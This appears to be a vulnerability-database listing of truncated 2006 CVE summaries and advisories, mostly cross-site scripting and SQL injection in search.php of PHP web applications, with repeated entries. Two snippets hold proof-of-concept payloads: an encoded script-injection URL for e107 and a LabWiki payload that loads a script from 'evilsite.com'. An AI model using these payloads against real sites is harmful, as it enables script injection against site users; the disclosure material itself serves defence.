CVE-2006-3382

CVE-2006-3382 is a cross-site scripting (XSS) vulnerability in the search.php component of mAds 1.0 , exploitable via the search string parameter. According to the records, remote attackers can inject arbitrary web script or HTML. The NVD metrics indicate a Medium base score (4.3) with network at...

CVE-2006-3329

The CVE-2006-3329 entry concerns a SQL injection in search.php of PHP/MySQL Classifieds (PHP Classifieds). The vulnerability is exploitable via the rate parameter, potentially affecting data confidentiality, integrity, and availability as indicated by CVSS v2 base metrics (AV:N/AC:L/Au:N/C:P/I:P/...

CVE-2006-3283

SQL injection vulnerability in Dating Agent PRO 4.7.1 allows remote attackers to execute arbitrary SQL commands via the 1 pid parameter in picture.php, 2 mid parameter in mem.php, and the 3 sex and 4 relationship parameters in search.php...

CVE-2006-3283

SQL injection vulnerability in Dating Agent PRO 4.7.1 allows remote attackers to execute arbitrary SQL commands via the 1 pid parameter in picture.php, 2 mid parameter in mem.php, and the 3 sex and 4 relationship parameters in search.php...

CVE-2006-3284

CVE-2006-3284 describes an XSS vulnerability in Dating Agent PRO 4.7.1. Affected component: login parameter in webmaster/index.php and search.php, enabling injection of arbitrary web script/HTML. The NVD entry records CVSSv2 base score 2.6 (LOW) with network attack, high complexity, no authentica...

CVE-2006-3259

Multiple cross-site scripting XSS vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the 1 ep parameter to search.php and the 2 subject parameter in comment.php aka the Subject field when posting a comment...

CVE-2006-3259

Multiple cross-site scripting XSS vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the 1 ep parameter to search.php and the 2 subject parameter in comment.php aka the Subject field when posting a comment...

mp3com.txt

mp3.com - Cross site scripting vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 15th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz...

CVE-2006-3174

Cross-site scripting XSS vulnerability in search.php in SquirrelMail 1.5.1 and earlier, when registerglobals is enabled, allows remote attackers to inject arbitrary HTML via the mailbox parameter...

CVE-2006-3174

CVE-2006-3174 is a cross-site scripting (XSS) vulnerability in SquirrelMail up to version 1.5.1, triggered in search.php when register_globals is enabled. An attacker could inject arbitrary HTML via the mailbox parameter, potentially affecting users who view the affected page. Connected documents...

CVE-2006-3174

Cross-site scripting XSS vulnerability in search.php in SquirrelMail 1.5.1 and earlier, when registerglobals is enabled, allows remote attackers to inject arbitrary HTML via the mailbox parameter...

e107 v0.7.5 XSS

http://target.xx/search.php?q=&r=0&s=Search&in=1&ex=1&ep= 273E3Cscript3Ealert282FXSS2F293C2Fscript 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author= ------------------ Submit comment Subject: 'scriptalert/XSS//script Click Reply to this you comment. Ellipsis Security http://www.ellsec.org...

CVE-2006-3001

Cross-site scripting XSS vulnerability in search.php in OkScripts OkMall 1.0 allow remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: this might be resultant from another vulnerability, since the XSS is reflected in an error message...

CVE-2006-2999

Cross-site scripting XSS vulnerability in search.php in OkScripts QuickLinks 1.1 allows remote attackers to inject arbitrary web script or HTML via the q parameter...

CVE-2006-3000

Cross-site scripting XSS vulnerability in search.php in OkScripts OkArticles 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...

CVE-2006-2883

CVE-2006-2883 concerns a cross-site scripting (XSS) vulnerability in Kmita FAQ 1.0’s search.php. The issue allows remote attackers to inject arbitrary web script or HTML via the q parameter. The vulnerability affects the search function and is documented with a CVSS 2.0 base score of 4.3 (Medium)...

CVE-2006-2883

Cross-site scripting XSS vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...

LabWiki v1.0

LabWiki 1.0 Homepage: http://www.bioinformatics.org/phplabware/labwiki/index.php Effected files: search.php The search input box does not sanatize user input before dynamically genrating it. XSS Proof of concept: "SCRIPT SRC=http://evilsite.com/xss.js/SCRIPT"...

CVE-2006-2827

SQL injection vulnerability in search.php in X-Cart Gold and Pro 4.0.18, and X-Cart 4.1.0 beta 1, allows remote attackers to execute arbitrary SQL commands via the "Search for pattern" field, when the settings specify only "Search in Detailed description" and "Search also in ISBN." NOTE: the vend...

CVE-2006-2827

SQL injection vulnerability in search.php in X-Cart Gold and Pro 4.0.18, and X-Cart 4.1.0 beta 1, allows remote attackers to execute arbitrary SQL commands via the "Search for pattern" field, when the settings specify only "Search in Detailed description" and "Search also in ISBN." NOTE: the vend...